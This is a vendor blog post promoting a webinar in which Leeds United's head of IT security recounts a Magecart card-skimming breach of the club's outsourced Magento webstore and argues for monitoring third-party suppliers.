The Leeds United Comeback: How One Attack Sparked a Security Revolution
Graham Peck has a great analogy for working in IT security: he compares it to being a goalkeeper. As a goalie, it’s usually the case that nobody remembers your name, but the moment you start letting the other side score, everybody knows who you are.
Graham makes this comparison because he is the Head of IT and Security at Leeds United Football Club in England, and because he suddenly became the focus of attention when the club’s webstore was hit with a card skimming attack in February 2025.
Watch the full webinar here.
The Magecart Attack: A Supply Chain Vulnerability
At Reflectiz, we appreciate that Graham agreed to answer questions about the breach with Isaac Moddel, our sales VP, in a live webinar setting (available here), because most businesses prefer to avoid the limelight. They aren’t keen to publicly dissect what happens when their web stores are hit with cyberattacks, because a breach can make even the strongest brand look vulnerable. But that’s exactly why Graham wanted to share his experience of what was an avoidable attack. He wants other businesses to learn from this story rather than go through it themselves. Especially since they may be thinking they have everything covered.
We had created almost like a breach playbook for different scenarios, for things like ransomware attacks and so forth, but this (attack) came a little bit out of left field, on the supply chain side, when we had assumed that everything was in place.
Graham Peck, Head of Security, Leeds United
Trust Without Visibility: The Root of the Problem
It turns out that everything wasn’t in place. The Leeds webstore was running on Magento, and six months before the breach, Adobe had notified Graham’s team about a security vulnerability in its popular shopping platform and issued a patch to fix it. Leeds had outsourced management of the web store to a third-party company, so his team duly let them know it needed to be implemented, and here’s where the problem lay.
We had raised a ticket with the third-party; they showed us they had patched it, but because we never had visibility within that environment, we trusted the third-party to do the work they said they were doing.
Graham Peck, Head of Security, Leeds United
This is one of the key takeaways from this valuable question-and-answer session. You may trust a third party to keep their word, but if you have no way of checking that they’re doing what they say they’re doing, you could be vulnerable to a Magecart-style attack and not even know it.
A Lucky Escape: Timing and Detection
Without Reflectiz in place, Graham had no way of checking if the company he was trusting to manage the club’s webstore had applied this essential security patch or not. The first clue that they hadn’t came when the police arrived to inform him that the UK’s National Crime and Security Centre had been monitoring another website and had noticed traffic coming to it from the Leeds webstore.
“…it was a traditional Magecart skimming attack. We confirmed through forensic analysis that they were able to upload the code on the 18th of February in the evening and had closed it on the 24th at about 10:30, when we got the third party to close the site itself. And during that period of time, we were lucky enough to only have a small amount of transactions that would be going through. It could have been a lot worse. Had there been a kit launch or something like that, it could have been quite disastrous.”
…it was a traditional Magecart skimming attack. We confirmed through forensic analysis that they were able to upload the code on the 18th of February in the evening and had closed it on the 24th at about 10:30, when we got the third party to close the site itself. And during that period of time, we were lucky enough to only have a small amount of transactions that would be going through. It could have been a lot worse. Had there been a kit launch or something like that, it could have been quite disastrous.
Graham Peck, Head of Security, Leeds United
The launch of a new kit means fans want to buy shirts, so the web store could be receiving thousands of orders, and the skimmer is waiting to steal their card details. So, Leeds was doubly lucky to be compromised during a quiet trading period and for the NCSC to notice the unusual traffic at a time that limited the criminals’ window of opportunity.
If you look at the average, you’re looking at over 195 days that somebody would be sitting on your network, skimming off data unbeknownst to you…we were extremely lucky to only have six days of data capture.
Graham Peck, Head of Security, Leeds United
The Cost of Relegation: Budgets and Security Priorities
Graham had encountered Reflectiz a year prior at InfoSec and been impressed, so one webinar viewer wondered why the tool wasn’t approved earlier. The answer is a familiar one: funding and priorities.
In 2023, Leeds United was relegated from the lucrative English Premier League, which meant that budgets were tighter. So, when Graham recommended Reflectiz to management, the timing was off. It wasn’t seen as a priority, but after the attack, he says it was approved in a week (although Reflectiz set up monitoring before approval was secured because we wanted to help Leeds identify any other vulnerabilities that might be lurking). The actual set-up process itself took less than a day, because it’s an agentless solution, with nothing to install.
I didn’t need to create an account for it…The only thing I did in some cases was…give an IP address so it can be whitelisted, and out of due diligence, informed the third party that we are going to be actively monitoring it…it keeps them on their toes…the advantage was, it was very low impact. It doesn’t affect the performance of the website at all. It’s non-intrusive…but brings back a lot of information.
Graham Peck, Head of Security, Leeds United
Convincing Management: The Power of Risk Assessments
Another viewer asked Graham what he would say to others who may be in the same situation that he was: unable to convince their organisations to take the threat as seriously as they should.
Watch the full webinar here.
He thinks that the key is risk assessments. If you can show a lack of visibility and control over what third and fourth parties are doing on a website, then you can show increased risk to the business, and that’s something that management is more likely to respond to:
I’m sitting here with proof that if you don’t have that visibility, you’ve no way of checking that they’ve done what they said they’ve done…in my case I had an email from a service desk that said they applied a patch, but without visibility of the code within the site, I would’ve just gone based on trust. Unfortunately, with the environment that we’re in now, you can’t just base everything on trust.
Graham Peck, Head of Security, Leeds United
Looking forward, the Leeds IT security team no longer has to rely on trust. They can now see if their new webstore provider installs patches and query them if Meta Pixel looks like it might be misconfigured, for example.
Learn More: Watch the Webinar for Key Insights
This is just a taste of the many valuable insights you’ll pick up from this informative webinar. Go here to watch and listen now for free.
Subscribe to our newsletter
Stay updated with the latest news, articles, and insights from Reflectiz.
Your Website looks great!
But what’s happening behind the scenes?
Discover your website blind spots and vulnerabilities before it’s too late!
